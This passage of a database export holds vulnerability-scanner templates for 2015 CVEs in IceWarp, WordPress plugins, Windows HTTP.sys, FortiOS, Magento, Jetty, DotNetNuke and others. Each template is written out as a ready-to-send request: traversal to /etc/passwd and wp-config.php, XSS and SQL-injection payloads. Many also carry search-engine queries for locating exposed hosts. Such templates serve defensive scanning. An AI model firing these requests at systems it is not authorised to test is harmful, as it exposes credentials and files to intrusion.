4b0a00483046022100d29b625c44598d6fd40ec90007af146d602b03e0287b866e32ee90257f77d1da022100c02ac12b1515f84fdbe501346868b0b6d8e31333da3750a76b2e01f9e0f40642:922c64590222798bb761d5b6d8e72950", "hash": "82c10f636a245b70f2e29536b86f1566", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f3e" }, "name": "CVE-2015-1503.yaml", "content": "id: CVE-2015-1503\n\ninfo:\n name: IceWarp Mail Server <11.1.1 - Directory Traversal\n author: 0x_Akoko\n severity: high\n description: IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.\n impact: |\n An attacker can access sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.\n remediation: |\n Upgrade IceWarp Mail Server to version 11.1.1 or above to mitigate the directory traversal vulnerability.\n reference:\n - https://packetstormsecurity.com/files/147505/IceWarp-Mail-Server-Directory-Traversal.html\n - http://www.icewarp.com\n - https://nvd.nist.gov/vuln/detail/CVE-2015-1503\n - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-001/?fid=5614\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2015-1503\n cwe-id: CWE-22\n epss-score: 0.90421\n epss-percentile: 0.98743\n cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: icewarp\n product: mail_server\n shodan-query: title:\"icewarp\"\n tags: cve2015,cve,lfi,mail,packetstorm,icewarp\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd\"\n - \"{{BaseURL}}/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502201bd23514796529bf6c27e2ed45c08b9340e59a12f04603253332ae63240298e60221008e8246877e3b62ffa7b8953c44fa788db96ddf30e232a558beca8f4d501588b4:922c64590222798bb761d5b6d8e72950", "hash": "9b3fe0eee1b35f92511c3d23fc3c24e0", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f3f" }, "name": "CVE-2015-1579.yaml", "content": "id: CVE-2015-1579\n\ninfo:\n name: WordPress Slider Revolution - Local File Disclosure\n author: pussycat0x\n severity: medium\n description: |\n Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.\n impact: |\n An attacker can read arbitrary files on the server, potentially exposing sensitive information.\n remediation: |\n Update the WordPress Slider Revolution plugin to the latest version to fix the vulnerability.\n reference:\n - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html\n - https://cxsecurity.com/issue/WLB-2021090129\n - https://wpscan.com/vulnerability/4b077805-5dc0-4172-970e-cc3d67964f80\n - https://nvd.nist.gov/vuln/detail/CVE-2015-1579\n - https://wpvulndb.com/vulnerabilities/7540\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2015-1579\n cwe-id: CWE-22\n epss-score: 0.90145\n epss-percentile: 0.9855\n cpe: cpe:2.3:a:elegant_themes:divi:-:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: elegant_themes\n product: divi\n framework: wordpress\n google-query: inurl:/wp-content/plugins/revslider\n tags: cve2015,cve,wordpress,wp-plugin,lfi,revslider,wp,wpscan,elegant_themes\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'\n - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"'DB_NAME'\"\n - \"'DB_PASSWORD'\"\n - \"'DB_USER'\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502204becd81302d4f8601be8cd91ccb030ee0b22d4f05138929b5c4fe80ad731504d0221008064061fb4305f15402851e4ad475a5ded2bd8427f87cb7c402471f54c9fc6b1:922c64590222798bb761d5b6d8e72950", "hash": "6cf8d2c98dee3087fc421b0946a9ca9f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f40" }, "name": "CVE-2015-1635.yaml", "content": "id: CVE-2015-1635\n\ninfo:\n name: Microsoft Windows 'HTTP.sys' - Remote Code Execution\n author: Phillipo\n severity: critical\n description: |\n HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka \"HTTP.sys Remote Code Execution Vulnerability.\"\n reference:\n - https://www.exploit-db.com/exploits/36773\n - https://www.securitysift.com/an-analysis-of-ms15-034/\n - https://nvd.nist.gov/vuln/detail/CVE-2015-1635\n - http://www.securitytracker.com/id/1032109\n - https://github.com/b1gbroth3r/shoMe\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C\n cvss-score: 10\n cve-id: CVE-2015-1635\n cwe-id: CWE-94\n epss-score: 0.97537\n epss-percentile: 0.99992\n cpe: cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: microsoft\n product: windows_7\n shodan-query: '\"Microsoft-IIS\" \"2015\"'\n tags: cve,cve2015,kev,microsoft,iis,rce\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\"\n headers:\n Range: \"bytes=0-18446744073709551615\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"HTTP Error 416\"\n - \"The requested range is not satisfiable\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"Microsoft\"\n# digest: 4a0a00473045022100a635f022b45e7a586ad5e4a4564a246654390e2469d4729272954c932b441eab02204e4776dc6153c0fcae6eaca611da6998b1e8e23d7bef84872c029f267912cd1b:922c64590222798bb761d5b6d8e72950", "hash": "053dfa5e3504286c451c320f1dd9361c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f41" }, "name": "CVE-2015-1880.yaml", "content": "id: CVE-2015-1880\n\ninfo:\n name: Fortinet FortiOS <=5.2.3 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade Fortinet FortiOS to a version higher than 5.2.3 to mitigate this vulnerability.\n reference:\n - https://www.c2.lol/articles/xss-in-fortigates-ssl-vpn-login-page\n - http://www.fortiguard.com/advisory/FG-IR-15-005/\n - https://nvd.nist.gov/vuln/detail/CVE-2015-1880\n - http://www.securitytracker.com/id/1032261\n - http://www.securitytracker.com/id/1032262\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2015-1880\n cwe-id: CWE-79\n epss-score: 0.00201\n epss-percentile: 0.57435\n cpe: cpe:2.3:o:fortinet:fortios:5.2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: fortinet\n product: fortios\n tags: cve2015,cve,xss,fortigates,intrusive,fortinet\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/remote/login?&err=--%3E%3Cscript%3Ealert('{{randstr}}')%3C/script%3E%3C!--&lang=en\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100fbd94b21f5439ca4ec407e9189271984eee7263b4225ff0c73f83bdad8a7d5b202210088a587ab57ec51554054af59f5f81cc6d51732d5c6f5928c95b3c4d7090af0df:922c64590222798bb761d5b6d8e72950", "hash": "4817a96454db3bf0a19b0e315c65fdf0", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f42" }, "name": "CVE-2015-20067.yaml", "content": "id: CVE-2015-20067\n\ninfo:\n name: WP Attachment Export < 0.2.4 - Unrestricted File Download\n author: r3Y3r53\n severity: high\n description: |\n The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress\n powered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.\n remediation: Fixed in 0.2.4\n reference:\n - https://wpscan.com/vulnerability/d1a9ed65-baf3-4c85-b077-1f37d8c7793a\n - https://packetstormsecurity.com/files/132693/\n - https://seclists.org/fulldisclosure/2015/Jul/73\n - https://nvd.nist.gov/vuln/detail/CVE-2015-20067\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2015-20067\n cwe-id: CWE-862\n epss-score: 0.07226\n epss-percentile: 0.93884\n cpe: cpe:2.3:a:wp_attachment_export_project:wp_attachment_export:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: wp_attachment_export_project\n product: wp_attachment_export\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/wp-attachment-export/\"\n tags: wpscan,packetstorm,seclists,cve,cve2015,wordpress,wp,wp-plugin,unauth,wp-attachment-export\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true\"\n - \"{{BaseURL}}/wp-admin/tools.php?content=&wp-attachment-export-download=true\"\n\n stop-at-first-match: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(header, \"text/xml\")'\n - 'contains_all(body, \"title\",\"wp:author_id\",\"wp:author_email\")'\n condition: and\n# digest: 4a0a00473045022100d4c3c8a7fdc18cc9462c2ff1355d9ed71c05410b6a47e49c34bf86bf83a0b2c202202a13e920f228d0071e72f33431c9108a38ddd87eb8cea4f84b92ea9147599a3a:922c64590222798bb761d5b6d8e72950", "hash": "2f123d2d1ab2b6ad592b2598d0f72d65", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f43" }, "name": "CVE-2015-2067.yaml", "content": "id: CVE-2015-2067\n\ninfo:\n name: Magento Server MAGMI - Directory Traversal\n author: daffainfo\n severity: medium\n description: Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files on the server.\n remediation: |\n Apply the latest security patches and updates provided by Magento.\n reference:\n - https://www.exploit-db.com/exploits/35996\n - https://nvd.nist.gov/vuln/detail/CVE-2015-2067\n - http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2015-2067\n cwe-id: CWE-22\n epss-score: 0.00709\n epss-percentile: 0.79991\n cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:*\n metadata:\n max-request: 1\n vendor: magmi_project\n product: magmi\n framework: magento_server\n shodan-query: http.component:\"Magento\"\n tags: cve2015,cve,plugin,edb,packetstorm,lfi,magento,magmi,magmi_project,magento_server\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210098c40f6c8c0649ca609f84e623426e75d8b4585cd3c8a8170af7ad182b173602022039dd4d44ad7c15033383f04ab8c95596af9694c2bd91a5d278cd8c0211408051:922c64590222798bb761d5b6d8e72950", "hash": "3d17f92f8f3aad92ebeb487c86f6638f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f44" }, "name": "CVE-2015-2068.yaml", "content": "id: CVE-2015-2068\n\ninfo:\n name: Magento Server Mass Importer - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: Magento Server Mass Importer plugin contains multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected Magento server.\n remediation: |\n Apply the latest security patches provided by Magento to fix the XSS vulnerability in the Server Mass Importer module.\n reference:\n - https://www.exploit-db.com/exploits/35996\n - http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html\n - https://nvd.nist.gov/vuln/detail/CVE-2015-2068\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2015-2068\n cwe-id: CWE-79\n epss-score: 0.00146\n epss-percentile: 0.4958\n cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: magmi_project\n product: magmi\n framework: magento_server\n shodan-query: http.component:\"Magento\"\n tags: cve2015,cve,plugin,edb,packetstorm,magento,magmi,xss,magmi_project,magento_server\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502201d5b527a7afaf9cd2298eecea9050abd7eb528161ddd9c8f6b3bb07fd1b3d401022100bc96b4607561b72a7ff1ebefd67594db87f556150aef7cee914c442f33c921bd:922c64590222798bb761d5b6d8e72950", "hash": "869c908582cf7845849f15460f77f985", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f45" }, "name": "CVE-2015-2080.yaml", "content": "id: CVE-2015-2080\n\ninfo:\n name: Eclipse Jetty <9.2.9.v20150224 - Sensitive Information Leakage\n author: pikpikcu\n severity: high\n description: Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header.\n remediation: |\n Upgrade to a version of Eclipse Jetty that is higher than 9.2.9.v20150224 to mitigate this vulnerability.\n reference:\n - https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md\n - https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html\n - http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html\n - https://nvd.nist.gov/vuln/detail/CVE-2015-2080\n - http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00074.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2015-2080\n cwe-id: CWE-200\n epss-score: 0.95465\n epss-percentile: 0.99329\n cpe: cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: fedoraproject\n product: fedora\n tags: cve2015,cve,jetty,packetstorm,fedoraproject\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}\"\n\n headers:\n Referer: \\x00\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Illegal character 0x0 in state\"\n\n - type: status\n status:\n - 400\n# digest: 490a0046304402205c8d0476a6f051a3ec41adbc3bbb3c3df32392a0a2d380ba4f7a3c845cca139702206f3666b9266c8b39bb342ff44104fe3ccc5b32839313e08d76981ce2ebdc12e6:922c64590222798bb761d5b6d8e72950", "hash": "683db05a351cbb93e255c35614671d15", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f46" }, "name": "CVE-2015-2166.yaml", "content": "id: CVE-2015-2166\n\ninfo:\n name: Ericsson Drutt MSDP - Local File Inclusion\n author: daffainfo\n severity: medium\n description: Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in the Ericsson Drutt MSDP application.\n reference:\n - https://www.exploit-db.com/exploits/36619\n - https://nvd.nist.gov/vuln/detail/CVE-2015-2166\n - http://packetstormsecurity.com/files/131233/Ericsson-Drutt-MSDP-Instance-Monitor-Directory-Traversal-File-Access.html\n - https://www.exploit-db.com/exploits/36619/\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2015-2166\n cwe-id: CWE-22\n epss-score: 0.23272\n epss-percentile: 0.96445\n cpe: cpe:2.3:a:ericsson:drutt_mobile_service_delivery_platform:4.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: ericsson\n product: drutt_mobile_service_delivery_platform\n tags: cve2015,cve,lfi,ericsson,edb,packetstorm\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022005ae10e49409ebd18ff174804d7b53c1ab9d1306850dfaff9163b785375be21c022100a6d97e3ba5c48553ae5e792432ca523f33cda27717ef085f3013c21e3dce7465:922c64590222798bb761d5b6d8e72950", "hash": "8e50538b3547af9f3e299a6b531bbdee", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f47" }, "name": "CVE-2015-2196.yaml", "content": "id: CVE-2015-2196\n\ninfo:\n name: WordPress Spider Calendar <=1.4.9 - SQL Injection\n author: theamanrawat\n severity: high\n description: |\n WordPress Spider Calendar plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or complete compromise of the WordPress site.\n remediation: Fixed in version 1.4.14.\n reference:\n - https://wpscan.com/vulnerability/8d436356-37f8-455e-99b3-effe8d0e3cad\n - https://wordpress.org/plugins/spider-event-calendar/\n - http://www.exploit-db.com/exploits/36061\n - https://nvd.nist.gov/vuln/detail/CVE-2015-2196\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2015-2196\n cwe-id: CWE-89\n epss-score: 0.0025\n epss-percentile: 0.6433\n cpe: cpe:2.3:a:web-dorado:spider_calendar:1.4.9:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: web-dorado\n product: spider_calendar\n framework: wordpress\n tags: cve2015,cve,wordpress,wp,sqli,wpscan,wp-plugin,spider-event-calendar,unauth,edb,web-dorado\n\nhttp:\n - raw:\n - |\n @timeout 10s\n GET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration_1>=6'\n - 'status_code == 200'\n - 'contains(body, \"{\\\"status\\\":true,\\\"data\\\"\")'\n condition: and\n# digest: 4b0a00483046022100bd7e63311d4cf6f8337571a1a59b5d7011819ff9c6b2ff98931e30318db0adf3022100ffe10684ebe0641b20298ef67f1e62873e23b9e6fc44edd1b0cbc5127ab7103b:922c64590222798bb761d5b6d8e72950", "hash": "ba9196b0ca368db2e164870f2497c33f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f48" }, "name": "CVE-2015-2755.yaml", "content": "id: CVE-2015-2755\n\ninfo:\n name: WordPress AB Google Map Travel <=3.4 - Stored Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress AB Google Map Travel plugin through 3.4 contains multiple stored cross-site scripting vulnerabilities. The plugin allows an attacker to hijack the administrator authentication for requests via the (1) lat (Latitude), (2) long (Longitude), (3) map_width, (4) map_height, or (5) zoom (Map Zoom) parameters in the ab_map_options page to wp-admin/admin.php.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement.\n remediation: |\n Update to the latest version of the AB Google Map Travel plugin (>=3.5) or apply the vendor-supplied patch to mitigate this vulnerability.\n reference:\n - https://packetstormsecurity.com/files/131155/\n - http://packetstormsecurity.com/files/131155/WordPress-Google-Map-Travel-3.4-XSS-CSRF.html\n - http://packetstormsecurity.com/files/130960/WordPress-AB-Google-Map-Travel-CSRF-XSS.html\n - https://nvd.nist.gov/vuln/detail/https://nvd.nist.gov/vuln/detail/CVE-2015-2755\n - https://wordpress.org/plugins/ab-google-map-travel/changelog/\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2015-2755\n cwe-id: CWE-352\n epss-score: 0.01828\n epss-percentile: 0.87952\n cpe: cpe:2.3:a:ab_google_map_travel_project:ab_google_map_travel:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: ab_google_map_travel_project\n product: ab_google_map_travel\n framework: wordpress\n tags: cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,authenticated,ab_google_map_travel_project\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n @timeout: 10s\n POST /wp-admin/admin.php?page=ab_map_options HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n lat=%22%3E+%3Cscript%3E%2B-%2B-1-%2B-%2Balert%28document.domain%29%3C%2Fscript%3E&long=76.26730&lang=en&map_width=500&map_height=300&zoom=7&day_less_five_fare=2&day_more_five_fare=1.5&less_five_fare=3&more_five_fare=2.5&curr_format=%24&submit=Update+Settings\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"\")'\n - 'contains(body_2, \"ab-google-map-travel\")'\n condition: and\n# digest: 4b0a00483046022100a8cc9f76a8f68db2a3748140015caa53d81843095f1e655982d65ba4131f12a30221008e49c9ca4169a002b1dbb5d8bc1e327243553007a41e8adfc1e6222a47cab0e2:922c64590222798bb761d5b6d8e72950", "hash": "6ac832954a1272afb75a235be91efb97", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f49" }, "name": "CVE-2015-2794.yaml", "content": "id: CVE-2015-2794\n\ninfo:\n name: DotNetNuke 07.04.00 - Administration Authentication Bypass\n author: 0xr2r\n severity: critical\n description: |\n The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2015-2794\n - https://www.exploit-db.com/exploits/39777\n - http://www.dnnsoftware.com/community-blog/cid/155198/workaround-for-potential-security-issue\n - http://www.dnnsoftware.com/community/security/security-center\n - https://dotnetnuke.codeplex.com/releases/view/615317\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2015-2794\n cwe-id: CWE-264\n epss-score: 0.97458\n epss-percentile: 0.99953\n cpe: cpe:2.3:a:dotnetnuke:dotnetnuke:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: dotnetnuke\n product: dotnetnuke\n fofa-query: app=\"DotNetNuke\"\n tags: cve2015,cve,dotnetnuke,auth-bypass,install\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Install/InstallWizard.aspx?__VIEWSTATE\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Administrative Information\"\n - \"Database Information\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100963e0da7dc7d871a054737b37e18f3cf4a88a499d60ab976e55a64b8b71b8f4802210098e0935f4fae3fb4f2771f8a890b65875b19cb5f1008ca03c9ac6ee6deebce71:922c64590222798bb761d5b6d8e72950", "hash": "7ff68d3643dd60815863f523f27569a1", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f4a" }, "name": "CVE-2015-2807.yaml", "content": "id: CVE-2015-2807\n\ninfo:\n name: Navis DocumentCloud <0.1.1 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: Navis DocumentCloud plugin before 0.1.1 for WordPress contains a reflected cross-site scripting vulnerability in js/window.php which allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to a version higher than 0.1.1 that includes proper input sanitization to mitigate the XSS vulnerability.\n reference:\n - https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/\n - https://security.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/\n - https://wordpress.org/plugins/navis-documentcloud/changelog/\n - https://nvd.nist.gov/vuln/detail/CVE-2015-2807\n - https://wpvulndb.com/vulnerabilities/8164\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2015-2807\n cwe-id: CWE-79\n epss-score: 0.00294\n epss-percentile: 0.68624\n cpe: cpe:2.3:a:documentcloud:navis_documentcloud:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: documentcloud\n product: navis_documentcloud\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/navis-documentcloud\"\n tags: cve2015,cve,wordpress,wp-plugin,xss,documentcloud\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/navis-documentcloud/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Navis'\n - 'Tags:'\n condition: and\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210088a6906ad39a7b6d77f1bf0198de8fc5e3e1f59c7606690649f554952b8e71d5022100b42919235cda07c096a34dce69f2d8ff8b3e19d5f309acbac8bbea3e9140e5fc:922c64590222798bb761d5b6d8e72950", "hash": "ce3a5908f0cf623904e12ecfeb48c043", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f4b" }, "name": "CVE-2015-2863.yaml", "content": "id: CVE-2015-2863\n\ninfo:\n name: Kaseya Virtual System Administrator - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: |\n Kaseya Virtual System Administrator 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 are susceptible to an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.\n remediation: |\n Apply the latest security patches and updates provided by Kaseya to fix the open redirect vulnerability in the Kaseya Virtual System Administrator (VSA).\n reference:\n - https://github.com/pedrib/PoC/blob/3f927b957b86a91ce65b017c4b9c93d05e241592/advisories/Kaseya/kaseya-vsa-vuln.txt\n - 